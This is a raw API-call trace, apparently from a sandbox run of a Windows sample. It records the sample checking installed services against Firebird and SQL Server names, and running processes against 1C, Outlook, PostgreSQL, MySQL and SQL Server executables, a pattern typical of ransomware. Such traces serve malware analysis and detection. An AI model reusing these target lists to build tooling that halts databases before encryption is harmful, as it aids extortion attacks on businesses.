	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0167.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0167.704] lstrlenW (lpString="DPS") returned 3
	[0167.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0167.705] lstrlenW (lpString="eventlog") returned 8
	[0167.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0167.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0167.705] lstrlenW (lpString="EventSystem") returned 11
	[0167.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0167.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0167.705] lstrlenW (lpString="gpsvc") returned 5
	[0167.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0167.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0167.705] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0167.705] lstrlenW (lpString="iphlpsvc") returned 8
	[0167.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0167.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0167.705] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0167.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0167.705] lstrlenW (lpString="LanmanServer") returned 12
	[0167.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0167.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0167.705] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0167.705] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0167.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0167.706] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0167.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0167.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0167.706] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0167.706] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0167.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0167.706] lstrlenW (lpString="lmhosts") returned 7
	[0167.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0167.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0167.706] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0167.706] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0167.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0167.706] lstrlenW (lpString="MMCSS") returned 5
	[0167.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0167.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0167.706] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0167.706] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0167.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0167.706] lstrlenW (lpString="MpsSvc") returned 6
	[0167.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0167.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0167.706] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0167.706] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0167.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0167.706] lstrlenW (lpString="Netman") returned 6
	[0167.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0167.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0167.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0167.707] lstrlenW (lpString="netprofm") returned 8
	[0167.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0167.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0167.707] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0167.707] lstrlenW (lpString="NlaSvc") returned 6
	[0167.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0167.707] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0167.707] lstrlenW (lpString="nsi") returned 3
	[0167.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0167.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0167.707] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0167.707] lstrlenW (lpString="PcaSvc") returned 6
	[0167.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0167.707] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0167.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0167.708] lstrlenW (lpString="PlugPlay") returned 8
	[0167.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0167.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0167.708] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0167.708] lstrlenW (lpString="Power") returned 5
	[0167.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0167.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0167.708] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0167.708] lstrlenW (lpString="ProfSvc") returned 7
	[0167.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0167.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0167.708] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0167.708] lstrlenW (lpString="RpcEptMapper") returned 12
	[0167.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0167.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0167.708] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0167.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0167.708] lstrlenW (lpString="RpcSs") returned 5
	[0167.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0167.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0167.709] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0167.709] lstrlenW (lpString="SamSs") returned 5
	[0167.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0167.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0167.709] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0167.709] lstrlenW (lpString="Schedule") returned 8
	[0167.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0167.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0167.709] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0167.709] lstrlenW (lpString="SENS") returned 4
	[0167.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0167.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0167.709] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0167.710] lstrlenW (lpString="ShellHWDetection") returned 16
	[0167.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0167.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0167.710] lstrlenW (lpString="Spooler") returned 7
	[0167.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0167.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0167.710] lstrlenW (lpString="SysMain") returned 7
	[0167.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0167.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0167.710] lstrlenW (lpString="Themes") returned 6
	[0167.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0167.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0167.710] lstrlenW (lpString="TrkWks") returned 6
	[0167.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0167.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0167.710] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0167.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0167.711] lstrlenW (lpString="UxSms") returned 5
	[0167.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0167.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0167.711] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0167.711] lstrlenW (lpString="WdiServiceHost") returned 14
	[0167.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0167.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0167.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0167.711] lstrlenW (lpString="WdiSystemHost") returned 13
	[0167.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0167.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0167.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0167.711] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0167.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.711] lstrlenW (lpString="Winmgmt") returned 7
	[0167.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0167.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0167.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0167.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0167.711] lstrlenW (lpString="WPDBusEnum") returned 10
	[0167.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0167.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0167.712] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0167.712] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0167.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0167.712] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0167.712] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0
	[0167.714] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0167.714] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0167.715] lstrlenW (lpString="System") returned 6
	[0167.715] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0167.715] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0167.715] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0167.715] lstrlenW (lpString="smss.exe") returned 8
	[0167.715] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0167.715] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0167.715] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0167.716] lstrlenW (lpString="csrss.exe") returned 9
	[0167.716] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0167.716] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0167.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0167.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0167.716] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0167.716] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0167.716] lstrlenW (lpString="wininit.exe") returned 11
	[0167.716] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0167.716] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0167.716] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0167.717] lstrlenW (lpString="csrss.exe") returned 9
	[0167.717] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0167.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0167.717] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0167.717] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0167.717] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0167.717] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0167.717] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0167.717] lstrlenW (lpString="winlogon.exe") returned 12
	[0167.717] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0167.718] lstrlenW (lpString="services.exe") returned 12
	[0167.718] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0167.718] lstrlenW (lpString="lsass.exe") returned 9
	[0167.718] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0167.719] lstrlenW (lpString="lsm.exe") returned 7
	[0167.719] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.719] lstrlenW (lpString="svchost.exe") returned 11
	[0167.720] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.720] lstrlenW (lpString="svchost.exe") returned 11
	[0167.720] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.720] lstrlenW (lpString="svchost.exe") returned 11
	[0167.720] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.720] lstrlenW (lpString="svchost.exe") returned 11
	[0167.720] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.721] lstrlenW (lpString="svchost.exe") returned 11
	[0167.721] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0167.721] lstrlenW (lpString="audiodg.exe") returned 11
	[0167.721] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.721] lstrlenW (lpString="svchost.exe") returned 11
	[0167.721] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.722] lstrlenW (lpString="svchost.exe") returned 11
